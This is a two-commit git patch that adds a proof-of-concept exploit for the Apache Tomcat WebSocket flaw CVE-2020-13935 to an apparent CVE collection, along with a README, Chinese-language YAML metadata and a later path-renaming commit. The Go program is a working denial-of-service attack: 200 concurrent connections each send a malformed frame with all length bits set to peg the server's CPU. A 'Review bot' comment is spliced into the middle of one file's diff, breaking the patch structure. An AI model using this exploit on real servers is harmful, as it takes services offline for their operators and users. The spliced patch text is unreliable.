From a3afc335afec7ecd101e160cdc514e8cf0a92182 Mon Sep 17 00:00:00 2001
From: lpy_888
Date: Mon, 13 Mar 2023 12:29:15 +0800
Subject: [PATCH 1/2] add CVE-2020-13935
---
 .../2020/CVE-2020-13935/.gitignore | 1 +
 cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE | 8 ++
 .../2020/CVE-2020-13935/README.md | 16 +++
 cve/apache-Tomcat/2020/CVE-2020-13935/go.mod | 5 +
 cve/apache-Tomcat/2020/CVE-2020-13935/go.sum | 2 +
 cve/apache-Tomcat/2020/CVE-2020-13935/main.go | 130 ++++++++++++++++++
 .../2020/yaml/CVE-2020-13935.yaml | 24 ++++
 openkylin_list.yaml | 2 +
 8 files changed, 188 insertions(+)
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/README.md
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/go.mod
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/go.sum
 create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/main.go
 create mode 100644 cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore
new file mode 100755
index 00000000..0f421f64
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore
@@ -0,0 +1 @@
+tcdos
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE
new file mode 100755
index 00000000..9fc105fe
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE
@@ -0,0 +1,8 @@
+Copyright 2020 RedTeam Pentesting GmbH
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/README.md b/cve/apache-Tomcat/2020/CVE-2020-13935/README.md
new file mode 100755
index 00000000..4aad55a8
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/README.md
@@ -0,0 +1,16 @@
+# Exploit for WebSocket Vulnerability in Apache Tomcat (CVE-2020-13935)
+
+In the corresponding [blog post](https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/)
+the analysis and exploitation of the vulnerability is explained in detail.
+
+## Usage
+
+Clone the repository, then build the `tcdos` binary. Run the program as follows to test
+whether a particular WebSocket endpoint is vulnerable:
+
+```
+$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
+$ cd CVE-2020-13935
+$ go build
+$ ./tcdos [WebSocket endpoint]
+```
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod
new file mode 100755
index 00000000..50a371a6
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod
@@ -0,0 +1,5 @@
+module tcdos
+
+go 1.14
+
+require github.com/gorilla/websocket v1.4.2
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum
new file mode 100755
index 00000000..85efffd9
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum
@@ -0,0 +1,2 @@
+github.com/gorilla/websocket v1.4.2 h1:+/TMaTYc4QFitKJxsQ7Yye35DkWvkdLcvGKqM+x0Ufc=
+github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/main.go b/cve/apache-Tomcat/2020/CVE-2020-13935/main.go
new file mode 100755
index 00000000..41acdcdb
--- /dev/null
+++ b/cve/apache-Tomcat/2020/CVE-2020-13935/main.go
@@ -0,0 +1,130 @@
+/****************************************
+ * *
+ * RedTeam Pentesting GmbH *
+ * kontakt@redteam-pentesting.de *
+ * https://www.redteam-pentesting.de/ *
+ * *
+ ****************************************/
+
+package main
+
+import (
+ "bytes"
+ "fmt"
+ "os"
+ "sync"
+ "time"
+
+ "github.com/gorilla/websocket"
+)
+
+// CVE-2020-13935
+//
+// this program exploits a bug in tomcat which leads to continuous,
+// high cpu usage if all bits of the length field of a websocket message
+// are set to 1.
+//
+// Affected Versions:
+// 10.0.0-M1 to 10.0.0-M6
+// 9.0.0.M1 to 9.0.36
+// 8.5.0 to 8.5.56
+// 8.0.1 to 8.0.53
+// 7.0.27 to 7.0.104
+//
+// see:
+// https://bz.apache.org/bugzilla/show_bug.cgi?id=64563
+// https://access.redhat.com/security/cve/CVE-2020-13935
+
+func main() {
+ if err := run(); err != nil {
+ fmt.Fprintln(os.Stderr, err)
+ }
+}
+
+func sendInvalidWebSocketMessage(url string) error {
+ ws, _, err := websocket.DefaultDialer.Dial(url, nil)
+
+ if err != nil {
+ return fmt.Errorf("dial: %s", err)
+ }
+
+ // +-+-+-+-+-------+-+-------------+-------------------------------+
+ // 0 1 2 3
+ // 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+ // +-+-+-+-+-------+-+-------------+-------------------------------+
+ // |F|R|R|R| opcode|M| Payload len | Extended payload length |
+ // |I|S|S|S| (4) |A| (7) | (16/64) |
+ // |N|V|V|V| |S| | (if payload len==126/127) |
+ // | |1|2|3| |K| | |
+ // +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +
+ // | Extended payload length continued, if payload len == 127 |
+ // + - - - - - - - - - - - - - - - +-------------------------------+
+ // | | Masking-key, if MASK set to 1 |
+ // +-------------------------------+-------------------------------+
+ // | Masking-key (continued) | Payload Data |
+ // +-------------------------------- - - - - - - - - - - - - - - - +
+ // : Payload Data continued ...
:
+ // + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
+ // | Payload Data continued ... |
+ // +---------------------------------------------------------------+
+
+ var buf bytes.Buffer
+
+ fin := 1
+ rsv1 := 0
+ rsv2 := 0
+ rsv3 := 0
+ opcode := websocket.TextMessage
+
+ buf.WriteByte(byte(fin<<7 | rsv1<<6 | rsv2<<5 | rsv3<<4 | opcode))
+
+ // always set the mask bit
+ // indicate 64 bit message length
+ buf.WriteByte(byte(1<<7 | 0b1111111))
+
+ // set msb to 1, violating the spec and triggering the bug
+ buf.Write([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF})
+
+ // 4 byte masking key
+ // leave zeros for now, so we do not need to mask
+ maskingKey := []byte{0, 0, 0, 0}
+ buf.Write(maskingKey)
+
+ // write an incomplete message
+ buf.WriteString("test")
+
+ _, err = ws.UnderlyingConn().Write(buf.Bytes())
+ if err != nil {
+ return fmt.Errorf("write: %s", err)
+ }
+
+ // keep the websocket connection open for some time
+ time.Sleep(30 * time.Second)
+
+ return nil
+}
+
+func run() error {
+ if len(os.Args) != 2 {
+ return fmt.Errorf("usage: %s target_url", os.Args[0])
+ }
+
+ targetURL := os.Args[1]
+
+ var wg sync.WaitGroup
+
+ for i := 0; i < 200; i++ {
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+
+ if err := sendInvalidWebSocketMessage(targetURL); err != nil {
+ fmt.Println(err)
+ }
+ }()
+ }
+
+ wg.Wait()
+
+ return nil
+}
diff --git a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml
new file mode 100644
index 00000000..e5175da2
--- /dev/null
+++ b/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml
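Review bot: `sendInvalidWebSocketMessage` dials a connection but never closes it, so each of the 200 goroutines started in `run` leaves its socket open until the process exits; add `defer ws.Close()` directly after the dial error check. `main` prints the error returned by `run` but still exits with status 0, so a usage error or a failed run is indistinguishable from success to a calling script — follow the `fmt.Fprintln(os.Stderr, err)` with `os.Exit(1)`. Both `fmt.Errorf` calls wrap with `%s`, which drops the underlying error for `errors.Is`/`errors.As` (`%w` keeps it), and the goroutine error path writes to stdout via `fmt.Println` while `main` writes to stderr. The file header should also state that the program produces no verdict of its own: per the comment, the effect is continuous high CPU usage on the target, so a run that prints nothing does not indicate the endpoint is patched and the result can only be read on the server side.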
@@ -0,0 +1,24 @@
+id: CVE-2020-13935
+source: https://github.com/RedTeamPentesting/CVE-2020-13935
+info:
+ name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
+ severity: high
+ description: |
+ Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
+ scope-of-influence:
+ Apache Tomcat 10.0.0-M1-10.0.0-M6
+ Apache Tomcat 9.0.0.M1-9.0.36
+ Apache Tomcat 8.5.0-8.5.56
+ Apache Tomcat 8.0.1-8.0.53
+ Apache Tomcat 7.0.27-7.0.104
+ reference:
+ - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/
+ - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2020-13935
+ cwe-id: CWE-835
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020,Apache Tomcat,拒绝服务
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a2eaf02..4a9e7b78 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -10,6 +10,8 @@ cve:
 - CVE-2021-27905
 apache-Spark:
 - CVE-2022-33891
+ apache-Tomcat:
+ - CVE-2020-13935
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
-- Gitee
From 67bbaac80341db23be773df33b9c0d1ac80146ac Mon Sep 17 00:00:00 2001
From: lpy_888
Date: Mon, 13 Mar 2023 14:41:40 +0800
Subject: [PATCH 2/2] add CVE-2020-13935
---
 .../2020/CVE-2020-13935/.gitignore | 0
 .../2020/CVE-2020-13935/LICENSE | 0
 .../2020/CVE-2020-13935/README.md | 0
 cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.mod | 0
 cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.sum | 0
 .../2020/CVE-2020-13935/main.go | 0
 .../2020/yaml/CVE-2020-13935.yaml | 2 +-
 openkylin_list.yaml | 2 +-
 8 files changed, 2 insertions(+), 2 deletions(-)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/.gitignore (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/LICENSE (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/README.md (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.mod (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.sum (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/main.go (100%)
 rename cve/{apache-Tomcat => apache-tomcat}/2020/yaml/CVE-2020-13935.yaml (95%)
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore
rename to cve/apache-tomcat/2020/CVE-2020-13935/.gitignore
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE
rename to cve/apache-tomcat/2020/CVE-2020-13935/LICENSE
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/README.md
rename to cve/apache-tomcat/2020/CVE-2020-13935/README.md
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/go.mod
rename to cve/apache-tomcat/2020/CVE-2020-13935/go.mod
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/go.sum
rename to cve/apache-tomcat/2020/CVE-2020-13935/go.sum
diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go
similarity index 100%
rename from cve/apache-Tomcat/2020/CVE-2020-13935/main.go
rename to cve/apache-tomcat/2020/CVE-2020-13935/main.go
diff --git a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml
similarity index 95%
rename from cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml
rename to cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml
index e5175da2..a8c37b12 100644
--- a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml
@@ -21,4 +21,4 @@ info:
 cwe-id: CWE-835
 cnvd-id: None
 kve-id: None
- tags: cve2020,Apache Tomcat,拒绝服务
+ tags: cve2020, Apache Tomcat, 拒绝服务
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 4a9e7b78..f9779633 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -10,7 +10,7 @@ cve:
 - CVE-2021-27905
 apache-Spark:
 - CVE-2022-33891
- apache-Tomcat:
+ apache-tomcat:
 - CVE-2020-13935
 linux-kernel:
 - CVE-2021-4204
-- Gitee